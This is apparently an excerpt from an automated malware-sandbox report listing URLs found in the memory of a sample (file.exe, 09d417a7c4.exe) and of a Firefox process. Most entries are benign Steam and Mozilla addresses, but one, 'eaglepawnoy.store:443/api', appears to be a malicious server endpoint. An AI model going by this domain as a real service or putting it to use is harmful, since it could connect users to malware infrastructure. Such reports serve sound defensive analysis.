Source: file.exe, file.exe, 00000000.00000003.2167800399.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2186250006.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2240990821.0000000000D6C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2186229688.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2184520949.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126652942.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2184690433.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2184075512.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2282756998.0000000000D72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2168617103.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2184807186.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2184381596.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2203677272.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140178683.0000000000D6F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000002.2950222857.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: file.exe, 00000000.00000003.2126652942.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000002.2950222857.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
Source: file.exe, 00000000.00000003.2126652942.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000002.2950222857.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=W9BX
Source: file.exe, 00000000.00000003.2126652942.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000002.2950222857.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
Source: file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2912331391.000000000101E000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000002.2952650199.000000000101F000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=bOP7RorZq4_W&amp;l=englis
Source: file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2912331391.000000000101E000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000002.2952650199.000000000101F000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
Source: file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=UuGFpt56D9L4&amp;l=
Source: file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=engli
Source: file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=KkhJqW2NGKiM&amp;l=engli
Source: file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&amp;
Source: file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2912331391.000000000101E000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000002.2952650199.000000000101F000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;
Source: file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
Source: file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2912331391.000000000101E000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000002.2952650199.000000000101F000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
Source: file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=qYlgdgWOD4Ng&amp
Source: file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2912331391.000000000101E000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000002.2952650199.000000000101F000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=engl
Source: 09d417a7c4.exe, 0000000B.00000003.2913281194.0000000001469000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2912913230.0000000001464000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva
Source: 09d417a7c4.exe, 0000000B.00000003.2913281194.0000000001469000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2912913230.0000000001464000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.a
Source: 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2912331391.000000000101E000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000002.2952650199.000000000101F000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=
Source: file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2913281194.0000000001469000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2912913230.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2912331391.000000000101E000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000002.2952650199.000000000101F000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=Ff_1prscqzeu&amp;
Source: 09d417a7c4.exe, 0000000B.00000003.2913281194.0000000001469000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2912913230.0000000001464000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DN
Source: file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2912331391.000000000101E000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000002.2952650199.000000000101F000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
Source: file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2913281194.0000000001469000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2912913230.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.3010399483.000000000146B000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2913281194.0000000001469000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2912913230.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.3010399483.000000000146B000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2913281194.0000000001469000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2912913230.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.3010399483.000000000146B000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
Source: file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2913281194.0000000001469000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2912913230.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.3010399483.000000000146B000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1
Source: 09d417a7c4.exe, 00000010.00000003.2912331391.000000000101E000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000002.2952650199.000000000101F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/share
Source: file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
Source: file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2912331391.000000000101E000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000002.2952650199.000000000101F000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
Source: file.exe, file.exe, 00000000.00000003.2167800399.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2203693833.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2240990821.0000000000D6C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2283865897.0000000000D61000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2186229688.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2184520949.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2184690433.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2184075512.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2168617103.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2184807186.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2184381596.0000000000D64000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.cz
Source: firefox.exe, 0000001B.00000002.3086777923.0000025508790000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000003.2885518412.0000025507B3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2886400929.0000025507B81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2884833153.0000025508100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2885905066.0000025507B60000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 0000001B.00000002.3096434663.000002550931C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3107641537.000002550977F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3138012152.000002551012A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
Source: file.exe, 00000000.00000003.2170327401.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3053862003.0000025507C59000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3051193396.0000025507A16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.2170327401.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3053862003.0000025507C59000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3051193396.0000025507A16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: firefox.exe, 0000001B.00000003.2946171739.0000025510196000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com
Source: firefox.exe, 0000001B.00000003.2946171739.0000025510196000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/
Source: firefox.exe, 0000001B.00000003.2946171739.0000025510196000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationsjar
Source: firefox.exe, 0000001B.00000002.3168103767.00001A2672204000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3086777923.0000025508790000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000003.2885518412.0000025507B3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3112720625.000002550A07D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2886400929.0000025507B81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2884833153.0000025508100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2977836511.0000025509AA6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3140692267.00000255104B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2885905066.0000025507B60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3172045873.00003F575EB04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3096434663.0000025509303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: file.exe, 00000000.00000003.2141362319.0000000005769000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2141309506.000000000576C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2141466478.0000000005769000.00000004.00000800.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2787827086.0000000005D8A000.00000004.00000800.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2787926502.0000000005D87000.00000004.00000800.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2788192740.0000000005D87000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2141362319.0000000005769000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2141309506.000000000576C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2141466478.0000000005769000.00000004.00000800.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2787827086.0000000005D8A000.00000004.00000800.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2787926502.0000000005D87000.00000004.00000800.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2788192740.0000000005D87000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2141362319.0000000005769000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2141309506.000000000576C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2141466478.0000000005769000.00000004.00000800.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2787827086.0000000005D8A000.00000004.00000800.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2787926502.0000000005D87000.00000004.00000800.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2788192740.0000000005D87000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 0000001B.00000002.3086777923.0000025508790000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000003.2939259406.00000255103A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3113974660.000002550A267000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/y
Source: 09d417a7c4.exe, 00000010.00000002.2950222857.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://eaglepawnoy.store:443/api
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3042197775.00000255074B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3051193396.0000025507A16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/673d2808-e5d8-41b9-957
Source: firefox.exe, 0000001B.00000003.2960052954.0000025509663000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2966789542.00000255096DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3113974660.000002550A27A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/d8e772fe-4909-4f05-9f9
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/f0f51715-7f5e-48de-839
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 0000001B.00000002.3086511909.0000025508770000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.3115820406.000002550A495000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FBE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FBE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1Connecting
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3042197775.00000255074B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3051193396.0000025507A16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 0000001B.00000003.2946171739.0000025510196000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3163874146.000002557FBD8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3042197775.00000255074B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3051193396.0000025507A16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3163874146.000002557FBE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3163874146.000002557FBD8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3042197775.00000255074B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3051193396.0000025507A16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
